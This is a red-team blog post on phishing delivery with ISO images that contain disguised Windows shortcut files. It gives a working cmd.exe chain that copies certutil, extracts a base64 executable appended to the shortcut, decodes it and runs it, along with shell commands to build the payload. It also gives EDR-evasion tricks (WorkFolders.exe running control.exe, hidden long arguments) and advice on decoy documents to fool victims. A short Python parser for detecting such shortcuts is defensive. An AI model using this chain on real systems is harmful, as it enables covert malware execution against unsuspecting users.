# TL;DR

```text
F:\quarterly_earnings_reportDec2021.lnk
```

This post describes the ISO+LNK delivery technique and provides relevant links and examples.

> **update:** It seems that defenders are still catching up on the technique. Another self-unpacking .LNK example was posted recently, with PowerShell this time: https://www.x86matthew.com/view_post?id=embed_exe_lnk

# intro

*sidenote: everybody hates MS Office and VBA; using .iso delivery is just an excuse to dodge having to write macros*

It would be a stretch to say that the MS Office attack surface is dying, especially when there is awesome current research in the field like Outflank's recent XLAM endeavors (https://outflank.nl/blog/2021/12/09/a-phishing-document-signed-by-microsoft/). However, for those of us who do not have the capabilities or time for in-depth research, the options are very limited. We either have to pray our macros do not get detected by the latest and greatest EDR solution, use an unreliable 1-day RCE PoC, or rely on published prior research that is not exactly easy to modify past the point of EDR recognition. This is why, when you are frustrated enough, you look for other options. I've heard that many threat actors use ISO files, so we'll try and do exactly that.

#### layout

The main idea is basically this:

```text
take a DLL/EXE -> make an LNK run it -> put everything in an ISO -> (optional) hide ISO with HTML smuggling
```

The actual payload is the part I'll go deeper into later; for now we'll just assume that the dropper you use is not detected, neither statically nor at runtime. Packing the ISO and HTML smuggling can both be done with a single command given the right tool, so I'll skip over them as well.
Easiest to use:

- https://github.com/Arno0x/EmbedInHTML -- HTML smuggling
- https://github.com/wikijm/PowerShell-AdminScripts/blob/master/Miscellaneous/New-IsoFile.ps1 -- ISO creation

It should go without saying that VHD/CAB/ZIP are all viable alternatives to ISO, though the approach differs slightly. This leaves us with a single task: creating the actual .LNK.

# LNK files

When creating a shortcut in Windows, we are presented with the following configuration options:

![[Pasted image 20211220161747.png]]

Some of them are obvious, like changing the icon to something believable (I suggest shell32.dll if you are too lazy to go looking for one) and making it run minimized. However, the most important thing to do, beyond fitting the file to your specific scenario, is making sure the ~~.LNK starts in `%cd%`~~ (this is a mistake: an empty field or something invalid would also work), which makes its working directory the mount point of the ISO.

![[Pasted image 20211220163035.png]]

As it is a shortcut, we need to point it at something.

## approach ø. pointing it at your exe

Too boring to cover, but may work against some EDRs. ¯\\_(ツ)_/¯

## approach i. self-unpacking LNK

**how-to**

LNK is a format that does not care about what comes after the marked content, and you can abuse that by appending data to it.
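The "marked content" boundary is the MS-SHLLINK TerminalBlock: everything after it is ignored when the shortcut is resolved, which is why appended data survives. As an added defender-side example (not code from the post), here is a small Python parser that walks that layout, pulls out the StringData fields, and reports how many bytes trail the TerminalBlock and whether the arguments exceed the 260 characters the properties dialog displays; the shortcut it builds is constructed for testing, not a real file.

```python
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_SECTIONS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                   ("arguments", 0x20), ("icon_location", 0x40)]  # StringData order + LinkFlags bit

def parse_lnk(data: bytes) -> dict:
    """Walk the MS-SHLLINK layout and record what sits past the TerminalBlock."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:                      # LinkTargetIDList: u16 IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfo: u32 LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    info = {}
    for key, bit in STRING_SECTIONS:             # each entry: u16 CountCharacters + chars, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            info[key] = data[pos + 2:pos + 2 + count * width].decode(codec)
            pos += 2 + count * width
    size = 4
    while size >= 4 and pos + 4 <= len(data):    # ExtraData blocks; the TerminalBlock has BlockSize < 4
        size = struct.unpack_from("<I", data, pos)[0]
        pos += max(size, 4)
    info["trailing_bytes"] = max(0, len(data) - pos)  # ignored by Explorer; a self-unpacking LNK lives here
    return info

def lnk_findings(data: bytes, shown_chars: int = 260) -> list:
    """Triage hints: appended payload data and command lines longer than the dialog shows."""
    info = parse_lnk(data)
    findings = []
    if info["trailing_bytes"]:
        findings.append(f"{info['trailing_bytes']} bytes appended after the TerminalBlock")
    if len(info.get("arguments", "")) > shown_chars:
        findings.append(f"arguments exceed the {shown_chars} chars the properties dialog shows")
    return findings

def build_sample_lnk(arguments: str, appended: bytes = b"") -> bytes:
    """Constructed minimal ANSI shortcut for testing; not a file from the post."""
    def s(text):                                 # StringData entry: u16 CountCharacters + chars
        return struct.pack("<H", len(text)) + text.encode("cp1252")
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", 0x08 | 0x10 | 0x20) + bytes(52)
    body = s("..\\Windows\\System32\\cmd.exe") + s(".") + s(arguments)
    return header + body + b"\x00\x00\x00\x00" + appended  # 4-byte TerminalBlock, then whatever is appended
```

Running `lnk_findings` over the shortcuts inside a mounted ISO gives a quick triage signal for both the appended-payload trick and the hidden long command line mentioned later in the post.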
I've used this particular example in a campaign once (not for delivery, though):

```bat
# newlines and comments added for visibility
%windir%\System32\cmd.exe /c copy pd_doc.lnk %TEMP%\r.tmp& # copy the lnk to TEMP
for /r %windir%\System32\ %i in (*ertuti*.exe) do copy %i %TEMP%\D.exe /y& # copy certutil to TEMP
# (to avoid calling it directly)
findstr /b "TVqQ" %temp%\r.tmp>%temp%\A.tmp&
# ^ grepping the LNK for our base64-encoded exe
%temp%\D.exe -f -decode %temp%\A.tmp %temp%\F.scr& # decoding it with our certutil copy
start %temp%\F.scr # running it
```

To prepare the payload, just run something similar to

```bash
$ printf "\n\n" >> pd_doc.lnk
$ cat loader.exe.b64 >> pd_doc.lnk
```

Then feel free to add that to an ISO image. You can also try hiding the command parameters by tampering with the LNK structure itself (the visible command line is 260 bytes; the actual limit is 4 kB).

**possible issues**

- A base64-encoded exe is not exactly what you'd call stealthy or evasive
- Same for megabyte-large LNKs
- Same for LNKs with long commands in the file path

## approach ii. LOLBINs

**how-to**

Using LOLBINs is a natural suggestion when you have a file format that can run a single command. You may be inclined to go with the standard:

```bat
C:\Windows\System32\rundll32.exe my.dll,Run # do not do this
```

However, during testing we found that many EDRs (looking at you, CrowdStrike) *really* don't like LNKs with parameters. Our solution was to use a LOLBIN that does not require parameters at all, like `C:\Windows\System32\WorkFolders.exe`. What it does (among other things) is run a file named `control.exe` if one is present in the current directory. Thus, the pipeline looks like this:

```text
create a dropper named control.exe -> make an LNK that points to WF and starts in %cd% -> put both into an ISO -> HTML smuggle the ISO to the victim
```

This approach significantly lowered the detection rate of our LNKs, and they were not even blocked at runtime.
However, this specific LOLBIN forces you to ship an EXE, which is not always desirable. The other option is using download+run LOLBINs, but:

- chaining >=2 commands requires you to point at cmd.exe/powershell.exe, which is bad for evasion
- using well-known download+execute binaries like MSHTA is prone to runtime blocking

## concerns besides execution

If you go with this approach as your delivery method, spend some effort to make it a little more believable.

- Make sure your dropper actually opens a decoy PDF/DOCX file, so as not to alert the victim
- Also, try to create the image so that it does not only contain your malware
- In general, consider matching your pretext to the delivery method (people do not often share CAB/ISO files with each other)

# credits

- Zajt for help with evasion testing
- https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/ for a self-unpacking example
- @ElliotKillick for the WorkFolders.exe tweet